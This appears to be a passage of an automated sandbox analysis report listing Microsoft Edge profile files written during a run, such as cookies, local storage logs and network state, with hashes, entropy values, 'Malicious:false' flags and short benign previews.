                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.21810997314429553
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:E/5lntFlljq7A/mhWJFuQ3yy7IOWUhOol/dweytllrE9SFcTp4AGbNCV9RUIVaq:+G75fO3P/d0Xi99pEYPh
                                                                                                                                                                                                                                                                                          MD5:8ECFBF6723BAA74C0D60D324E898D1CC
                                                                                                                                                                                                                                                                                          SHA1:0E705BD2C3532F6283D46FF11A9493CC78322B5A
                                                                                                                                                                                                                                                                                          SHA-256:56A194E953FD3A80465D4BFB1028BDD1127249BAA7D438A53C9F28B628829F84
                                                                                                                                                                                                                                                                                          SHA-512:CBFA797F649DD702A297A6CE25D6DE8444B2F17293FCDC0F8469E5EC742938AD03C3909DED8559FB40CAA4FF6D36BF1207D6B093BDFBA93C0D075F3A7546795D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):45056
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9191745569751775
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:jj9P0M9QkQerkjlxP/KbtLcNhkCgam6IFRKToaAF773pLG:jdbe2mlxP/NN+F1RKcJ78
                                                                                                                                                                                                                                                                                          MD5:12B4A9E8D31E4F8760CB069D0E1458B5
                                                                                                                                                                                                                                                                                          SHA1:C443527D050318AC5BC19E04908E979579468F40
                                                                                                                                                                                                                                                                                          SHA-256:F1ADD781C042608C43B9946D2BD386772520710DFD28EDEEA8D76A19C080BD70
                                                                                                                                                                                                                                                                                          SHA-512:582123C68D287CAF410CF05F1B9EB9F2A4F8BA574B2C875EC6EDCC17AC2FC4045680360295727F23C291798A6D20074BE821B5F17EB37B987B73A5D3093E6027
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):401
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.27035630477187
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yGl+v8wZYeb8rcHEZrELFUt8xG5W/+xGEV5TwZYeb8rcHEZrEZSJ:C8wZYeb8nZrExg8aBTwZYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:884388DAA0EC5646C212E08830AAA517
                                                                                                                                                                                                                                                                                          SHA1:93E373A8BF0633845E6761696FFF3EF2A4821D46
                                                                                                                                                                                                                                                                                          SHA-256:B3250A40CECA893F7DB288615388F6780A714E12B263B4BB48A911B4915DD4AB
                                                                                                                                                                                                                                                                                          SHA-512:512614EA90C53CF8AB3FBF94FDCC6B6221AA95C380CA4EB627F77A7CED98CEEC3A0D0388AE4D9340DAFD1886A1744207F1D22CF55455CC52FD0382134E2BAF4F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:34.298 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/30-09:55:34.299 8ec Recovering log #3.2024/12/30-09:55:34.299 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):401
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.27035630477187
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yGl+v8wZYeb8rcHEZrELFUt8xG5W/+xGEV5TwZYeb8rcHEZrEZSJ:C8wZYeb8nZrExg8aBTwZYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:884388DAA0EC5646C212E08830AAA517
                                                                                                                                                                                                                                                                                          SHA1:93E373A8BF0633845E6761696FFF3EF2A4821D46
                                                                                                                                                                                                                                                                                          SHA-256:B3250A40CECA893F7DB288615388F6780A714E12B263B4BB48A911B4915DD4AB
                                                                                                                                                                                                                                                                                          SHA-512:512614EA90C53CF8AB3FBF94FDCC6B6221AA95C380CA4EB627F77A7CED98CEEC3A0D0388AE4D9340DAFD1886A1744207F1D22CF55455CC52FD0382134E2BAF4F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:34.298 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/30-09:55:34.299 8ec Recovering log #3.2024/12/30-09:55:34.299 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1659
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.643840140839902
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:6tZ/m0lFyUFXZ8pV03Sx4LylsE/y3u7AHHk2GJ341:6tcGFyUROp2osldP1
                                                                                                                                                                                                                                                                                          MD5:ADDCC13A0E532863551E0D20FB134C33
                                                                                                                                                                                                                                                                                          SHA1:8981353B599E2DE00D18DEAF096512ECC3969087
                                                                                                                                                                                                                                                                                          SHA-256:1950226ED39B52BC2C7DF0CF5B56FAB3517F501C8C98EB8431713B95F41F869D
                                                                                                                                                                                                                                                                                          SHA-512:07775B71312D2FFDD83193082378B000808DBE328DF86B44BBED68ACD96A8BC89E69BB1F137212295234CB226A0DA7FFB6F789B815891AE8C167FD44050DAC20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:]{$.8................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":926}.!_https://ntp.msn.com..LastKnownPV..1735570537795.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735570538864.._https://ntp.msn.com..MUID!.0D1D943A7B9D67B72691815F7AEF6664.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735570537892,"schedule":[33,-1,-1,27,12,-1,-1],"scheduleFixed":[33,-1,-1,27,12,-1,-1],"simpleSchedule":[9,50,23,18,31,19,10]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735570537684.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2196863812288115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5barq2PqLTwi23oH+Tcwt8a2jMGIFUt8MbaSZmw+MbaX6FkwOqLTwi23oH+Tcwtw:yv8wZYeb8EFUt8I/+J25TwZYeb8bJ
                                                                                                                                                                                                                                                                                          MD5:966F1FDABBE07979B98A910823F247D4
                                                                                                                                                                                                                                                                                          SHA1:507B8ECE4D9FF06245048FAF4FB3A3B0CD99CF40
                                                                                                                                                                                                                                                                                          SHA-256:31A763ECF63F3D1899653044B07D51AEBAA67DE0192016A5EE9AAA80E255C457
                                                                                                                                                                                                                                                                                          SHA-512:E96D03A25184B7237FAAE17FCF8948E52BF472C043A4F2EAA88367F0FF353EF72F248E0398AEC70CBD0E3ECDA6D7F94BE6EA6B72DCA434CF3CF93B81D40FD93E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.674 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/30-09:55:29.678 1f70 Recovering log #3.2024/12/30-09:55:29.681 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2196863812288115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5barq2PqLTwi23oH+Tcwt8a2jMGIFUt8MbaSZmw+MbaX6FkwOqLTwi23oH+Tcwtw:yv8wZYeb8EFUt8I/+J25TwZYeb8bJ
                                                                                                                                                                                                                                                                                          MD5:966F1FDABBE07979B98A910823F247D4
                                                                                                                                                                                                                                                                                          SHA1:507B8ECE4D9FF06245048FAF4FB3A3B0CD99CF40
                                                                                                                                                                                                                                                                                          SHA-256:31A763ECF63F3D1899653044B07D51AEBAA67DE0192016A5EE9AAA80E255C457
                                                                                                                                                                                                                                                                                          SHA-512:E96D03A25184B7237FAAE17FCF8948E52BF472C043A4F2EAA88367F0FF353EF72F248E0398AEC70CBD0E3ECDA6D7F94BE6EA6B72DCA434CF3CF93B81D40FD93E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.674 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/30-09:55:29.678 1f70 Recovering log #3.2024/12/30-09:55:29.681 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2a8d2372-370a-4c76-bf94-f5db60a2ae0c.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2b061c3e-4271-4bc8-8a9b-c53f3e050b18.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.765092842427983
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:tTGY/QexzU1ARIHHLmPfTh0E527CbXcf0L/ZJVb:VGY/NzU+InLm3Th0EQqXI0LhJVb
                                                                                                                                                                                                                                                                                          MD5:0A8F322FAC1CB24BFD57315087C889C1
                                                                                                                                                                                                                                                                                          SHA1:8E03F73C6113F8954AF05A887C931AAB94AE36F8
                                                                                                                                                                                                                                                                                          SHA-256:28545DA31200D7A358A5E5B9F42CD4B5005BAF6FAA7327D694532B28F9A3588C
                                                                                                                                                                                                                                                                                          SHA-512:56E04BD32B7EADC0AB52AB8C02A38034F49A7EC6D64B21B3F118BD5775A6C8E182AD58E0CBC61B0EEAC0348B2295805FC882B74E58A38EE72E3E2E6D20AF3038
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.300219280553516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YcCp/WRdsyEyZVMdmwC5mWRdsXZFRudFGRw6ma3yeesw6C1VdsyyZFGJ/I3w6maF:YcCpWs6uCvsJfc7leeBRsfgCgkhYhbw
                                                                                                                                                                                                                                                                                          MD5:DAA6689D48F0E63BF12DE0B533E61307
                                                                                                                                                                                                                                                                                          SHA1:4B096964F1AC28CCA273B7646F77FE5D6B963857
                                                                                                                                                                                                                                                                                          SHA-256:8F0EDE645B73265FDE1459410F1F22D48DF47486B88463173E6DD01525D87AA1
                                                                                                                                                                                                                                                                                          SHA-512:58F153D53A680BAC9A918ED1AA9E91FAF26E194135C1DB35CF71FBA045061A1ECD83AC80C0A3C54E7584F37EE90FF54B4C20CB06A6DB246F9B0F03859D467F46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561982935006","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561983636053","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3aba2.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.300219280553516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YcCp/WRdsyEyZVMdmwC5mWRdsXZFRudFGRw6ma3yeesw6C1VdsyyZFGJ/I3w6maF:YcCpWs6uCvsJfc7leeBRsfgCgkhYhbw
                                                                                                                                                                                                                                                                                          MD5:DAA6689D48F0E63BF12DE0B533E61307
                                                                                                                                                                                                                                                                                          SHA1:4B096964F1AC28CCA273B7646F77FE5D6B963857
                                                                                                                                                                                                                                                                                          SHA-256:8F0EDE645B73265FDE1459410F1F22D48DF47486B88463173E6DD01525D87AA1
                                                                                                                                                                                                                                                                                          SHA-512:58F153D53A680BAC9A918ED1AA9E91FAF26E194135C1DB35CF71FBA045061A1ECD83AC80C0A3C54E7584F37EE90FF54B4C20CB06A6DB246F9B0F03859D467F46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561982935006","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561983636053","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2801431947091404
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB+WY:OIEumQv8m1ccnvS6dajiiFTPNk1a
                                                                                                                                                                                                                                                                                          MD5:014B31ED0A2688B99AC57B008C984B1E
                                                                                                                                                                                                                                                                                          SHA1:DA892DC8BB4566DEB3D8D2E02A592C69F6158751
                                                                                                                                                                                                                                                                                          SHA-256:5C3D2AF5CF8C7BE3188E4014EB62C5362E11471F84064CAD669B5A7FFA23D2D0
                                                                                                                                                                                                                                                                                          SHA-512:362261E5A1B863E2733B8DADD11CC4C531DB9D327A8805F45F9E70DD51EAC03419A2A9F483E09CCB1394C8660A660469012C9689E20E40A57420FF7C523B9491
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF29a42.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2aa40.TMP (copy)

